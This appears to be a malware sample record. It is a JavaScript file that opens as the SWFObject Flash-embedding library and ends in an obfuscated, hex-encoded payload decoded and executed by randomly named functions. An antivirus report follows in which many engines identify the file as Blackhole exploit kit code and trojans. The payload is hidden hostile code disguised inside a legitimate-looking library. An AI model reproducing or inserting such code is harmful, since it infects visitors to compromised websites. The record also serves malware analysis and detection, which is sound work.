// only when they do not exist yet, so an earlier definition is left in place.
if (typeof deconcept === "undefined") {
  var deconcept = {};
}
if (typeof deconcept.util === "undefined") {
  deconcept.util = {};
}
if (typeof deconcept.SWFObjectUtil === "undefined") {
  deconcept.SWFObjectUtil = {};
}
deconcept.SWFObject = function(swf, id, w, h, ver, c, useExpressInstall, quality, xiRedirectUrl, redirectUrl, detectKey){
if (!document.getElementById) { return; }
this.DETECT_KEY = detectKey ? detectKey : 'detectflash';
this.skipDet
... 3220 bytes are skipped ...^86^8f^85^41^4a^41^4a^5c^2e^2b^9e^2e^2b^8a^87^41^49^8f^82^97^8a^88^82^95^90^93^4f^84^90^90^8c^8a^86^66^8f^82^83^8d^86^85^4a^2e^2b^9c^2e^2b^8a^87^49^68^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4a^5e^5e^56^56^4a^9c^9e^86^8d^94^86^9c^74^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4d^41^48^56^56^48^4d^41^48^52^48^4d^41^48^50^48^4a^5c^2e^2b^2e^2b^84^89^93^51^5a^49^4a^5c^2e^2b^9e^2e^2b^9e".split(imerxq);vzvkf="";pqs("arCode");ljjn(""+vzvkf);}
Antivirus reports (each engine name is followed by the detection name it assigned):
- Qihoo-360
- Trojan.Generic
- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-AUU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.EB
- Ikarus
- JS.Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.EB
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Trojan:JS/Quidvetis.C
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|